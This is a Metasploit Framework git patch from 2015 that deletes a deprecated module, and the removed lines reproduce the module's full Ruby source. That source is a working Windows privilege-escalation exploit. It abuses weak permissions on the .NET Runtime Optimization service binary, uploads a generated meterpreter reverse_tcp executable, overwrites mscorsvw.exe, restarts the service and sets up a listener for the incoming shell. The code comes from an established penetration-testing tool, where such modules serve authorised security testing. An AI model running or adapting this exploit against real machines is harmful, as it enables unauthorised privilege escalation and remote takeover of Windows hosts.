From d7375e84eae0a97afcdc42961095fcbba2d449f2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 26 Jan 2015 00:29:43 -0600 Subject: [PATCH] Move modules/post/windows/escalate/net_runtime_modify.rb This module was scheduled to be removed on 01/08/2015. Please use exploit/windows/local/service_permissions instead. --- .../windows/escalate/net_runtime_modify.rb | 177 ------------------ 1 file changed, 177 deletions(-) delete mode 100644 modules/post/windows/escalate/net_runtime_modify.rb diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb deleted file mode 100644 index 97e9fa6ab1..0000000000 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ /dev/null @@ -1,177 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'rex' - -class Metasploit3 < Msf::Post - - require 'msf/core/module/deprecated' - include Msf::Module::Deprecated - deprecated Date.new(2015, 1, 8), 'exploit/windows/local/service_permissions' - - include Msf::Post::Windows::Services - - def initialize(info={}) - super( update_info( info, - 'Name' => 'Windows Escalate Microsoft .NET Runtime Optimization Service Privilege Escalation', - 'Description' => %q{ - This module attempts to exploit the security permissions set on the .NET Runtime - Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. - The permissions on this service allow domain users and local power users to modify - the mscorsvw.exe binary. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'bannedit' ], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => - [ - [ 'OSVDB', '71013' ], - [ 'EDB', '16940' ] - ] - )) - - register_options([ - OptAddress.new("LHOST", [ false, "Listener IP address for the new session" ]), - OptPort.new("LPORT", [ false, "Listener port for the new session", 4444 ]), - ]) - - end - - def run - paths = [] - candidate_services = [] - vuln = "" - @temp = session.sys.config.getenv('TEMP') - - if init_railgun() == :error - return - end - - print_status("Checking for vulnerable .NET Framework Optimization service") - print_status("This may take a few minutes.") - # enumerate the installed .NET versions - each_service do |service| - if service[:name] =~ /clr_optimization_.*/ - info = service_info(service[:name]) - paths << info[:path] - candidate_services << service[:name] - begin - service_stop(service[:name]) # temporarily stop the service - print_status("Found #{service[:name]} installed") - rescue - print_error("We do not appear to have access to stop #{service[:name]}") - end - else - next - end - end - - paths.each do |image| - if check_perms(image) - vuln << image - break - end - end - - if vuln.nil? or vuln.empty? - print_error("Could not find any vulnerable .NET Framework Optimization services") - return - else - payload = setup_exploit - end - - candidate_services.each do |service| - session.railgun.kernel32.CopyFileA(payload, vuln, false) - - # restart the service - status = service_restart(service) - - if status - print_status("Restarted #{service}") - else - print_error("Failed to restart #{service}") - end - return - end - end - - def check_perms(image) - if image !~ /mscor/ - return - end - - if !session.railgun.kernel32.MoveFileA(image, image + '.bak')['return'] - print_error("Found Secure Permissions on #{image}") - return false - else - print_status("Found Weak Permissions on #{image}") - print_status("Exploiting...") - return true - end - end - - def init_railgun - begin - rg = session.railgun - if (!rg.get_dll('advapi32')) - rg.add_dll('advapi32') - end - rescue Exception => e - print_error("Could not initalize railgun") - print_error("Railgun Error: #{e}") - return :error - end - end - - def setup_exploit - lhost = datastore["LHOST"] || Rex::Socket.source_address - lport = datastore["LPORT"] || 4444 - p_mod = datastore['PAYLOAD'] || "windows/meterpreter/reverse_tcp" - file = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - - payload = session.framework.payloads.create(p_mod) - payload.datastore['LHOST'] = lhost - payload.datastore['LPORT'] = lport - - exe = Msf::Util::EXE.to_win32pe_service(session.framework, payload.generate) - begin - print_status("Uploading payload #{file} executable to temp directory") - # Upload the payload to the filesystem - file = @temp + "\\" + file - fd = session.fs.file.new(file, "wb") - print_status("Writing #{file}...") - fd.write(exe) - fd.close - rescue Exception => e - print_error("Error uploading file #{file}: #{e.class} #{e}") - return - end - - print_status("Setting up multi/handler...") - print_status("Using Payload #{p_mod}...") - handler = session.framework.exploits.create("multi/handler") - handler.register_parent(self) - handler.datastore['PAYLOAD'] = p_mod - handler.datastore['LHOST'] = lhost - handler.datastore['LPORT'] = lport - handler.datastore['InitialAutoRunScript'] = "migrate -f" - handler.datastore['ExitOnSession'] = true - handler.datastore['ListenerTimeout'] = 300 - handler.datastore['ListenerComm'] = 'local' - - # handler.exploit_module = self - handler.exploit_simple( - 'LocalInput' => self.user_input, - 'LocalOutput' => self.user_output, - 'Payload' => handler.datastore['PAYLOAD'], - 'RunAsJob' => true - ) - - print_status("Upload complete") - return file - end -end